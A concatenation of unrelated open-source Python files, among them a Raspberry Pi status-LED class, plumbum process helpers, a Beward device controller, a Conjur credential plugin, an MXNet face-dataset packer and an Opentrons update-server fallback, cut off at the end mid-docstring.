start_email_imap_trigger_monitor()
start_email_outlook_trigger_monitor()
start_botflow_execution_monitor()
|
status.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 by Murray Altheim. All rights reserved. This file is part of
# the Robot OS project and is released under the "Apache Licence, Version 2.0".
# Please see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2020-01-17
# modified: 2020-01-17
#
import time, threading
#import RPi.GPIO as GPIO
#from .import_gpio import *
import lib.import_gpio
from .logger import Level, Logger
# ..............................................................................
class Status():
'''
Status Task: turns the status light on and off when it is set enabled or disabled.
This also provides a thread-based blinker using blink(), halted by disable().
Note that its status light functionality is not affected by enable or disable,
as the purpose of this behaviour is to show that the overall OS is running.
'''
# ..........................................................................
def __init__(self, config, GPIO, level):
self._log = Logger('status', level)
self._log.debug('initialising...')
if config is None:
raise ValueError('no configuration provided.')
_config = config['ros'].get('status')
self._led_pin = _config.get('led_pin')
self.GPIO = GPIO
self.GPIO.setwarnings(False)
self.GPIO.setmode(GPIO.BCM)
self.GPIO.setup(self._led_pin, GPIO.OUT, initial=GPIO.LOW)
self._blink_thread = None
self._blinking = False
self._log.info('ready.')
# ..........................................................................
def __blink__(self):
'''
The blinking thread.
'''
while self._blinking:
self.GPIO.output(self._led_pin,True)
time.sleep(0.5)
self.GPIO.output(self._led_pin,False)
time.sleep(0.5)
self._log.info('blink complete.')
# ..........................................................................
def blink(self, active):
if active:
if self._blink_thread is None:
self._log.debug('starting blink...')
self._blinking = True
self._blink_thread = threading.Thread(target=Status.__blink__, args=[self,])
self._blink_thread.start()
else:
self._log.warning('ignored: blink already started.')
else:
if self._blink_thread is None:
self._log.debug('ignored: blink thread does not exist.')
else:
self._log.info('stop blinking...')
self._blinking = False
self._blink_thread.join()
self._blink_thread = None
self._log.info('blink thread ended.')
# ..........................................................................
def enable(self):
self._log.info('enable status light.')
self.GPIO.output(self._led_pin, True)
# ..........................................................................
def disable(self):
self._log.info('disable status light.')
self.GPIO.output(self._led_pin,False)
self._blinking = False
# ..........................................................................
def close(self):
self._log.info('closing status light...')
self._blinking = False
self.GPIO.output(self._led_pin,False)
self._log.info('status light closed.')
#EOF
|
processes.py
|
# -*- coding: utf-8 -*-
import atexit
import heapq
import sys
import time
from threading import Thread
from plumbum.lib import IS_WIN32, six
if sys.version_info >= (3,):
from io import StringIO
from queue import Empty as QueueEmpty
from queue import Queue
else:
from cStringIO import StringIO
from Queue import Empty as QueueEmpty
from Queue import Queue
# ===================================================================================================
# utility functions
# ===================================================================================================
def _check_process(proc, retcode, timeout, stdout, stderr):
proc.verify(retcode, timeout, stdout, stderr)
return proc.returncode, stdout, stderr
def _iter_lines_posix(proc, decode, linesize, line_timeout=None):
try:
from selectors import EVENT_READ, DefaultSelector
except ImportError:
# Pre Python 3.4 implementation
from select import select
def selector():
while True:
rlist, _, _ = select([proc.stdout, proc.stderr], [], [], line_timeout)
if not rlist and line_timeout:
raise ProcessLineTimedOut(
"popen line timeout expired",
getattr(proc, "argv", None),
getattr(proc, "machine", None),
)
for stream in rlist:
yield (stream is proc.stderr), decode(stream.readline(linesize))
else:
# Python 3.4 implementation
def selector():
sel = DefaultSelector()
sel.register(proc.stdout, EVENT_READ, 0)
sel.register(proc.stderr, EVENT_READ, 1)
while True:
ready = sel.select(line_timeout)
if not ready and line_timeout:
raise ProcessLineTimedOut(
"popen line timeout expired",
getattr(proc, "argv", None),
getattr(proc, "machine", None),
)
for key, mask in ready:
yield key.data, decode(key.fileobj.readline(linesize))
for ret in selector():
yield ret
if proc.poll() is not None:
break
for line in proc.stdout:
yield 0, decode(line)
for line in proc.stderr:
yield 1, decode(line)
def _iter_lines_win32(proc, decode, linesize, line_timeout=None):
class Piper(Thread):
def __init__(self, fd, pipe):
super().__init__(name="PlumbumPiper%sThread" % fd)
self.pipe = pipe
self.fd = fd
self.empty = False
self.daemon = True
super().start()
def read_from_pipe(self):
return self.pipe.readline(linesize)
def run(self):
for line in iter(self.read_from_pipe, b""):
queue.put((self.fd, decode(line)))
# self.pipe.close()
if line_timeout is None:
line_timeout = float("inf")
queue = Queue()
pipers = [Piper(0, proc.stdout), Piper(1, proc.stderr)]
last_line_ts = time.time()
empty = True
while True:
try:
yield queue.get_nowait()
last_line_ts = time.time()
empty = False
except QueueEmpty:
empty = True
if time.time() - last_line_ts > line_timeout:
raise ProcessLineTimedOut(
"popen line timeout expired",
getattr(proc, "argv", None),
getattr(proc, "machine", None),
)
if proc.poll() is not None:
break
if empty:
time.sleep(0.1)
for piper in pipers:
piper.join()
while True:
try:
yield queue.get_nowait()
except QueueEmpty:
break
if IS_WIN32:
_iter_lines = _iter_lines_win32
else:
_iter_lines = _iter_lines_posix
# ===================================================================================================
# Exceptions
# ===================================================================================================
class ProcessExecutionError(EnvironmentError):
"""Represents the failure of a process. When the exit code of a terminated process does not
match the expected result, this exception is raised by :func:`run_proc
<plumbum.commands.run_proc>`. It contains the process' return code, stdout, and stderr, as
well as the command line used to create the process (``argv``)
"""
def __init__(self, argv, retcode, stdout, stderr, message=None):
Exception.__init__(self, argv, retcode, stdout, stderr)
self.message = message
self.argv = argv
self.retcode = retcode
if six.PY3 and isinstance(stdout, six.bytes):
stdout = six.ascii(stdout)
if six.PY3 and isinstance(stderr, six.bytes):
stderr = six.ascii(stderr)
self.stdout = stdout
self.stderr = stderr
def __str__(self):
# avoid an import cycle
from plumbum.commands.base import shquote_list
stdout = "\n | ".join(str(self.stdout).splitlines())
stderr = "\n | ".join(str(self.stderr).splitlines())
cmd = " ".join(shquote_list(self.argv))
lines = []
if self.message:
lines = [self.message, "\nReturn code: | ", str(self.retcode)]
else:
lines = ["Unexpected exit code: ", str(self.retcode)]
cmd = "\n | ".join(cmd.splitlines())
lines += ["\nCommand line: | ", cmd]
if stdout:
lines += ["\nStdout: | ", stdout]
if stderr:
lines += ["\nStderr: | ", stderr]
return "".join(lines)
class ProcessTimedOut(Exception):
"""Raises by :func:`run_proc <plumbum.commands.run_proc>` when a ``timeout`` has been
specified and it has elapsed before the process terminated"""
def __init__(self, msg, argv):
Exception.__init__(self, msg, argv)
self.argv = argv
class ProcessLineTimedOut(Exception):
"""Raises by :func:`iter_lines <plumbum.commands.iter_lines>` when a ``line_timeout`` has been
specified and it has elapsed before the process yielded another line"""
def __init__(self, msg, argv, machine):
Exception.__init__(self, msg, argv, machine)
self.argv = argv
self.machine = machine
class CommandNotFound(AttributeError):
"""Raised by :func:`local.which <plumbum.machines.local.LocalMachine.which>` and
:func:`RemoteMachine.which <plumbum.machines.remote.RemoteMachine.which>` when a
command was not found in the system's ``PATH``"""
def __init__(self, program, path):
Exception.__init__(self, program, path)
self.program = program
self.path = path
# ===================================================================================================
# Timeout thread
# ===================================================================================================
class MinHeap(object):
def __init__(self, items=()):
self._items = list(items)
heapq.heapify(self._items)
def __len__(self):
return len(self._items)
def push(self, item):
heapq.heappush(self._items, item)
def pop(self):
heapq.heappop(self._items)
def peek(self):
return self._items[0]
_timeout_queue = Queue()
_shutting_down = False
def _timeout_thread_func():
waiting = MinHeap()
try:
while not _shutting_down:
if waiting:
ttk, _ = waiting.peek()
timeout = max(0, ttk - time.time())
else:
timeout = None
try:
proc, time_to_kill = _timeout_queue.get(timeout=timeout)
if proc is SystemExit:
# terminate
return
waiting.push((time_to_kill, proc))
except QueueEmpty:
pass
now = time.time()
while waiting:
ttk, proc = waiting.peek()
if ttk > now:
break
waiting.pop()
try:
if proc.poll() is None:
proc.kill()
proc._timed_out = True
except EnvironmentError:
pass
except Exception:
if _shutting_down:
# to prevent all sorts of exceptions during interpreter shutdown
pass
else:
raise
bgthd = Thread(target=_timeout_thread_func, name="PlumbumTimeoutThread")
bgthd.daemon = True
bgthd.start()
def _register_proc_timeout(proc, timeout):
if timeout is not None:
_timeout_queue.put((proc, time.time() + timeout))
def _shutdown_bg_threads():
global _shutting_down
_shutting_down = True
# Make sure this still exists (don't throw error in atexit!)
if _timeout_queue:
_timeout_queue.put((SystemExit, 0))
# grace period
bgthd.join(0.1)
atexit.register(_shutdown_bg_threads)
# ===================================================================================================
# run_proc
# ===================================================================================================
def run_proc(proc, retcode, timeout=None):
"""Waits for the given process to terminate, with the expected exit code
:param proc: a running Popen-like object, with all the expected methods.
:param retcode: the expected return (exit) code of the process. It defaults to 0 (the
convention for success). If ``None``, the return code is ignored.
It may also be a tuple (or any object that supports ``__contains__``)
of expected return codes.
:param timeout: the number of seconds (a ``float``) to allow the process to run, before
forcefully terminating it. If ``None``, not timeout is imposed; otherwise
the process is expected to terminate within that timeout value, or it will
be killed and :class:`ProcessTimedOut <plumbum.cli.ProcessTimedOut>`
will be raised
:returns: A tuple of (return code, stdout, stderr)
"""
_register_proc_timeout(proc, timeout)
stdout, stderr = proc.communicate()
proc._end_time = time.time()
if not stdout:
stdout = six.b("")
if not stderr:
stderr = six.b("")
if getattr(proc, "custom_encoding", None):
if hasattr(stdout, "decode"):
stdout = stdout.decode(proc.custom_encoding, "ignore")
if hasattr(stderr, "decode"):
stderr = stderr.decode(proc.custom_encoding, "ignore")
return _check_process(proc, retcode, timeout, stdout, stderr)
# ===================================================================================================
# iter_lines
# ===================================================================================================
BY_POSITION = object()
BY_TYPE = object()
DEFAULT_ITER_LINES_MODE = BY_POSITION
def iter_lines(
proc,
retcode=0,
timeout=None,
linesize=-1,
line_timeout=None,
mode=None,
_iter_lines=_iter_lines,
):
"""Runs the given process (equivalent to run_proc()) and yields a tuples of (out, err) line pairs.
If the exit code of the process does not match the expected one, :class:`ProcessExecutionError
<plumbum.commands.ProcessExecutionError>` is raised.
:param retcode: The expected return code of this process (defaults to 0).
In order to disable exit-code validation, pass ``None``. It may also
be a tuple (or any iterable) of expected exit codes.
:param timeout: The maximal amount of time (in seconds) to allow the process to run.
``None`` means no timeout is imposed; otherwise, if the process hasn't
terminated after that many seconds, the process will be forcefully
terminated an exception will be raised
:param linesize: Maximum number of characters to read from stdout/stderr at each iteration.
``-1`` (default) reads until a b'\\n' is encountered.
:param line_timeout: The maximal amount of time (in seconds) to allow between consecutive lines in either stream.
Raise an :class:`ProcessLineTimedOut <plumbum.commands.ProcessLineTimedOut>` if the timeout has
been reached. ``None`` means no timeout is imposed.
:returns: An iterator of (out, err) line tuples.
"""
if mode is None:
mode = DEFAULT_ITER_LINES_MODE
assert mode in (BY_POSITION, BY_TYPE)
encoding = getattr(proc, "custom_encoding", None) or "utf-8"
decode = lambda s: s.decode(encoding, errors="replace").rstrip()
_register_proc_timeout(proc, timeout)
buffers = [StringIO(), StringIO()]
for t, line in _iter_lines(proc, decode, linesize, line_timeout):
# verify that the proc hasn't timed out yet
proc.verify(timeout=timeout, retcode=None, stdout=None, stderr=None)
buffers[t].write(line + "\n")
if mode is BY_POSITION:
ret = [None, None]
ret[t] = line
yield tuple(ret)
elif mode is BY_TYPE:
yield (t + 1), line # 1=stdout, 2=stderr
# this will take care of checking return code and timeouts
_check_process(proc, retcode, timeout, *(s.getvalue() for s in buffers))
|
core.py
|
# Copyright (c) 2019-2021, Andrey "Limych" Khrolenok <andrey@khrolenok.ru>
# Creative Commons BY-NC-SA 4.0 International Public License
# (see LICENSE.md or https://creativecommons.org/licenses/by-nc-sa/4.0/)
"""Beward devices controller core."""
import logging
import socket
import threading
from datetime import datetime
from time import sleep
from typing import Optional
import requests
from requests import ConnectTimeout, PreparedRequest, RequestException, Response
from requests.auth import HTTPBasicAuth
from beward.util import is_valid_fqdn, normalize_fqdn
from .const import ALARM_ONLINE, BEWARD_MODELS, MSG_GENERIC_FAIL, TIMEOUT
_LOGGER = logging.getLogger(__name__)
# pylint: disable=too-many-instance-attributes
class BewardGeneric:
"""Generic Implementation for Beward device."""
_class_group = "Beward"
@staticmethod
# pylint: disable=unsubscriptable-object
def get_device_type(model: Optional[str]) -> Optional[str]:
"""Detect device type for model."""
if not model:
return None
for dev_type, models in BEWARD_MODELS.items():
if model in models.split():
return dev_type
return None
# pylint: disable=unused-argument
def __init__(self, host: str, username: str, password: str, port=None, **kwargs):
"""Initialize generic Beward device controller."""
self._sysinfo = None
self._listen_alarms = False
self._listener = None
if port is None:
try:
port = host.split(":")[1]
except IndexError:
pass
host = normalize_fqdn(host)
try:
if not is_valid_fqdn(host):
socket.inet_aton(host)
except OSError as exc:
raise ValueError("Not a valid host address") from exc
self.host = host
self.port = int(port) if port else 80
self.username = username
self.password = password
self.session = requests.session()
self.params = {}
self.last_activity = None
self.alarm_state = {
ALARM_ONLINE: False,
}
self.alarm_timestamp = {
ALARM_ONLINE: datetime.min,
}
self._alarm_handlers = set()
self._alarm_listeners = []
def __del__(self):
"""Destructor."""
self._listen_alarms = False
if self._listener:
self._listener.join()
def get_url(
self, function: str, extra_params=None, username=None, password=None
) -> str:
"""Get entry point for function."""
url = "http://"
if username:
url += username
if password:
url += ":" + password
url += "@"
url += "%s:%d/cgi-bin/%s_cgi" % (self.host, self.port, function)
if extra_params:
url = self.add_url_params(url, extra_params)
return url
def add_url_params(self, url: str, extra_params: dict) -> str:
"""Add params to URL."""
params = self.params.copy()
params.update(extra_params)
req = PreparedRequest()
req.prepare_url(url, params)
return req.url
# pylint: disable=unsubscriptable-object
def query(self, function: str, extra_params=None) -> Optional[Response]:
"""Query data from Beward device."""
url = self.get_url(function)
_LOGGER.debug("Querying %s", url)
response = None
# allow to override params when necessary
# and update self.params globally for the next connection
params = self.params.copy()
if extra_params:
params.update(extra_params)
# Add authentication data
auth = HTTPBasicAuth(self.username, self.password)
try:
req = self.session.get(url, params=params, auth=auth, timeout=TIMEOUT)
_LOGGER.debug("_query ret %s", req.status_code)
except Exception as err_msg:
_LOGGER.error("Error! %s", err_msg)
raise
if req.status_code == 200 or req.status_code == 204:
response = req
if response is None: # pragma: no cover
_LOGGER.debug("%s", MSG_GENERIC_FAIL)
return response
def add_alarms_handler(self, handler: callable):
"""Add alarms handler."""
self._alarm_handlers.add(handler)
return self
def remove_alarms_handler(self, handler: callable):
"""Remove alarms handler."""
if handler in self._alarm_handlers:
self._alarm_handlers.remove(handler)
self._listen_alarms = len(self._alarm_handlers) != 0
return self
def _handle_alarm(self, timestamp: datetime, alarm: str, state: bool):
"""Handle alarms from Beward device."""
_LOGGER.debug("Handle alarm: %s; State: %s", alarm, state)
self.last_activity = timestamp
self.alarm_timestamp[alarm] = timestamp
self.alarm_state[alarm] = state
for handler in self._alarm_handlers:
handler(self, timestamp, alarm, state)
def listen_alarms(self, channel: int = 0, alarms=None):
"""Listen for alarms from Beward device."""
if alarms is None: # pragma: no cover
alarms = {}
url = self.get_url("alarmchangestate")
_LOGGER.debug("Querying %s", url)
params = self.params.copy()
params.update({"channel": channel, "parameter": ";".join(set(alarms))})
auth = HTTPBasicAuth(self.username, self.password)
self._listen_alarms = len(self._alarm_handlers) != 0
self._listener = threading.Thread(
target=self.__alarms_listener, args=(url, params, auth), daemon=True
)
self._listener.start()
self._alarm_listeners.append(self._listener)
_LOGGER.debug("Return from listen_alarms()")
def __alarms_listener(self, url: str, params, auth):
while self._listen_alarms:
try:
resp = requests.get(url, params=params, auth=auth, stream=True)
except RequestException: # pragma: no cover
break
_LOGGER.debug("_query ret %s", resp.status_code)
if not self._listen_alarms: # pragma: no cover
break
if resp.status_code != 200: # pragma: no cover
sleep(TIMEOUT)
continue
self._handle_alarm(datetime.now(), ALARM_ONLINE, True)
for line in resp.iter_lines(chunk_size=1, decode_unicode=True):
if not self._listen_alarms: # pragma: no cover
break
if line:
_LOGGER.debug("Alarm: %s", line)
date, time, alert, state, _ = str(line).split(";", 5)
timestamp = datetime.strptime(
date + " " + time, "%Y-%m-%d %H:%M:%S"
)
state = state != "0"
self._handle_alarm(timestamp, alert, state)
self._handle_alarm(datetime.now(), ALARM_ONLINE, False)
self._handle_alarm(datetime.now(), ALARM_ONLINE, False) # pragma: no cover
def get_info(self, function: str) -> dict:
"""Get info from Beward device."""
info = {}
data = self.query(function, extra_params={"action": "get"}).text
for env in data.splitlines():
(key, val) = env.split("=", 2)
info[key] = val
return info
@property
def system_info(self) -> dict:
"""Get system info from Beward device."""
if self._sysinfo:
return self._sysinfo
self._sysinfo = {}
try:
self._sysinfo = self.get_info("systeminfo")
except ConnectTimeout:
pass
return self._sysinfo
@property
# pylint: disable=unsubscriptable-object
def device_type(self) -> Optional[str]:
"""Detect device type."""
return self.get_device_type(self.system_info.get("DeviceModel"))
def is_online(self) -> bool:
"""Return True if entity is online."""
try:
self.query("systeminfo")
except ConnectTimeout:
return False
return True
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self.is_online()
|
conjur.py
|
from .plugin import CredentialPlugin
import base64
import os
import stat
import tempfile
import threading
from urllib.parse import urljoin, quote_plus
from django.utils.translation import ugettext_lazy as _
import requests
conjur_inputs = {
'fields': [{
'id': 'url',
'label': _('Conjur URL'),
'type': 'string',
'format': 'url',
}, {
'id': 'api_key',
'label': _('API Key'),
'type': 'string',
'secret': True,
}, {
'id': 'account',
'label': _('Account'),
'type': 'string',
}, {
'id': 'username',
'label': _('Username'),
'type': 'string',
}, {
'id': 'cacert',
'label': _('Public Key Certificate'),
'type': 'string',
'multiline': True
}],
'metadata': [{
'id': 'secret_path',
'label': _('Secret Identifier'),
'type': 'string',
'help_text': _('The identifier for the secret e.g., /some/identifier'),
}, {
'id': 'secret_version',
'label': _('Secret Version'),
'type': 'string',
'help_text': _('Used to specify a specific secret version (if left empty, the latest version will be used).'),
}],
'required': ['url', 'api_key', 'account', 'username'],
}
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(
target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)
).start()
return path
def conjur_backend(**kwargs):
url = kwargs['url']
api_key = kwargs['api_key']
account = quote_plus(kwargs['account'])
username = quote_plus(kwargs['username'])
secret_path = quote_plus(kwargs['secret_path'])
version = kwargs.get('secret_version')
cacert = kwargs.get('cacert', None)
auth_kwargs = {
'headers': {'Content-Type': 'text/plain'},
'data': api_key
}
if cacert:
auth_kwargs['verify'] = create_temporary_fifo(cacert.encode())
# https://www.conjur.org/api.html#authentication-authenticate-post
resp = requests.post(
urljoin(url, '/'.join(['authn', account, username, 'authenticate'])),
**auth_kwargs
)
resp.raise_for_status()
token = base64.b64encode(resp.content).decode('utf-8')
lookup_kwargs = {
'headers': {'Authorization': 'Token token="{}"'.format(token)},
}
if cacert:
lookup_kwargs['verify'] = create_temporary_fifo(cacert.encode())
# https://www.conjur.org/api.html#secrets-retrieve-a-secret-get
path = urljoin(url, '/'.join([
'secrets',
account,
'variable',
secret_path
]))
if version:
path = '?'.join([path, version])
resp = requests.get(path, timeout=30, **lookup_kwargs)
resp.raise_for_status()
return resp.text
conjur_plugin = CredentialPlugin(
'CyberArk Conjur Secret Lookup',
inputs=conjur_inputs,
backend=conjur_backend
)
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
import pdb
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
idToPathFile = open("id_to_path.txt", "w")
with open(path_in) as fin:
identities = []
last = [-9999999, -1]
_id = 1
baseDir = os.path.dirname(path_in)
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not os.path.exists(item.image_path):
pathItemList = item.image_path.split('/')
item.image_path = os.path.join(baseDir, pathItemList[-3], pathItemList[-2], pathItemList[-1])
if not os.path.exists(item.image_path):
print('path error! ignore line: ', line)
continue
if not item.aligned and item.landmark is None:
print('ignore line: ', line)
continue
item.id = _id #item index
item.label = [label, item.aligned]
# record id<==>path
idToPathFile.write("%d, %s\n" % (item.id, item.image_path))
yield item
if label!=last[0]: #save (label,id ) relation info. endding of each class
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))] #last _id , last _id + len(ids)
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item # each endding item of each class
idToPathFile.close()
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write1', item.flag, item.id, item.label)
if item.aligned:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
print('write2', item.flag, item.id, item.label) #anchor + class info saved in IRHeader
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
prop = face_image.load_property(working_dir)
image_size = prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
if item.id == 0:
print("*****************************")
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
IEngine.py
|
import typing
from abc import ABC, abstractmethod
from threading import Thread
from typing import Callable
if typing.TYPE_CHECKING:
from fishy.gui import GUI
class IEngine(ABC):
def __init__(self, config, gui_ref: 'Callable[[], GUI]'):
self.get_gui = gui_ref
self.start = False
self.window = None
self.thread = None
self.config = config
@property
def gui(self):
return self.get_gui().funcs
def toggle_start(self):
self.start = not self.start
if self.start:
self.thread = Thread(target=self.run)
self.thread.start()
@abstractmethod
def run(self):
...
|
serverlib_fallback.py
|
# This file duplicates the implementation of ot2serverlib. Remove once all
# robots have new update endpoints
import os
import json
import asyncio
import logging
from time import sleep
from aiohttp import web
from threading import Thread
log = logging.getLogger(__name__)
PATH = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(PATH, 'ignore.json')
async def _install(filename, loop):
proc = await asyncio.create_subprocess_shell(
'pip install --upgrade --force-reinstall --no-deps {}'.format(
filename),
stdout=asyncio.subprocess.PIPE,
loop=loop)
rd = await proc.stdout.read()
res = rd.decode().strip()
print(res)
await proc.wait()
return res
async def install_py(data, loop):
filename = data.filename
log.info('Preparing to install: {}'.format(filename))
content = data.file.read()
with open(filename, 'wb') as wf:
wf.write(content)
msg = await _install(filename, loop)
log.debug('Install complete')
try:
os.remove(filename)
except OSError:
pass
log.debug("Result: {}".format(msg))
return {'message': msg, 'filename': filename}
async def install_smoothie_firmware(data, loop):
from opentrons.server.endpoints.update import _update_firmware
filename = data.filename
log.info('Flashing image "{}", this will take about 1 minute'.format(
filename))
content = data.file.read()
with open(filename, 'wb') as wf:
wf.write(content)
msg = await _update_firmware(filename, loop)
log.debug('Firmware Update complete')
try:
os.remove(filename)
except OSError:
pass
log.debug("Result: {}".format(msg))
return {'message': msg, 'filename': filename}
def _set_ignored_version(version):
"""
Private helper function that writes the most updated
API version that was ignored by a user in the app
:param version: Most recent ignored API update
"""
data = {'version': version}
with open(filepath, 'w') as data_file:
json.dump(data, data_file)
def _get_ignored_version():
"""
:return: Most recently ignored API version
"""
if os.path.exists(filepath):
with open(filepath) as data_file:
data = json.load(data_file)
version = data.get('version')
else:
version = None
return version
async def get_ignore_version(request):
"""
This handler returns a GET request of form application/json.
The return body will be formatted as:
{"version": version_ignored}
If no version has been previously ignored, the value will be null
"""
ignored_version = _get_ignored_version()
res = {'version': ignored_version}
return web.json_response(res)
async def set_ignore_version(request):
"""
This handler expects a POST request of form application/json.
The request body should be formatted as:
{"version": version_ignored}
The POST will 400 in the following scenarios:
1. Sending an empty dict
2. Sending a dict with an empty string
"""
data = await request.json()
if 'version' in data.keys():
ignored_version = data.get('version')
log.debug('Set Ignore Version to {}'.format(ignored_version))
if ignored_version == '':
status = 400
res = {'version': None}
else:
_set_ignored_version(ignored_version)
status = 200
res = {'version': ignored_version}
else:
status = 400
res = {'version': None}
return web.json_response(res, status=status)
async def update_api(request: web.Request) -> web.Response:
"""
This handler accepts a POST request with Content-Type: multipart/form-data
